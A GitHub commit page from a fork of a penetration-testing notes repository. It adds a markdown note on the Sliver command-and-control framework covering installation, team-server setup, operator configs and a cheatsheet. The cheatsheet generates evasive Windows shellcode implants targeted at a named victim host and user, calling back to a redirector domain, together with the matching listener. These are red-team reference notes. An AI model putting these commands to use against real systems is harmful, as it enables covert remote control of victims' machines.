forked from snovvcrash/PPN
-
Notifications
You must be signed in to change notification settings - Fork 0
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
- Loading branch information
1 parent
daaff20
commit 1766272
Showing
6 changed files
with
132 additions
and
69 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,50 @@ | ||
# Sliver | ||
|
||
- [https://github.com/BishopFox/sliver](https://github.com/BishopFox/sliver) | ||
|
||
|
||
|
||
|
||
## Install | ||
|
||
- [https://github.com/BishopFox/sliver/releases/latest](https://github.com/BishopFox/sliver/releases/latest) | ||
|
||
Install team server as a daemon on the team server: | ||
|
||
``` | ||
$ curl https://sliver.sh/install | sudo bash | ||
``` | ||
|
||
For a client get a `sliver-client` binary from releases. | ||
|
||
|
||
|
||
|
||
## Configure Team Server for Multiplayer | ||
|
||
- [https://github.com/BishopFox/sliver/wiki/Configuration-Files](https://github.com/BishopFox/sliver/wiki/Configuration-Files) | ||
|
||
Change [multiplayer](https://github.com/BishopFox/sliver/wiki/Multiplayer-Mode) listener host (daemon mode) and restart: | ||
|
||
``` | ||
$ sudo vi /root/.sliver/configs/server.json | ||
$ sudo systemctl restart sliver.service | ||
``` | ||
|
||
Generate config for a new operator: | ||
|
||
``` | ||
$ sudo /root/sliver-server operator --name snovvcrash-kali-home --lhost <PRIVATE_IP> --lport 31337 --save snovvcrash_<PRIVATE_IP>.cfg | ||
``` | ||
|
||
|
||
|
||
|
||
## Cheatsheet | ||
|
||
A redirector-aware pair of payload and listener (when redirecting to `PRIVATE_IP:8443`): | ||
|
||
``` | ||
sliver > generate --os windows --arch amd64 --format shellcode [--evasion] --http example.com:443 [--limit-datetime 1970-01-01] [--limit-hostname VICTIM-PC] [--limit-username victim.user] --name victimpc --save /home/snovvcrash/www/shellcode.bin | ||
sliver > https --domain example.com --lhost <PRIVATE_IP> --lport 8443 | ||
``` |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters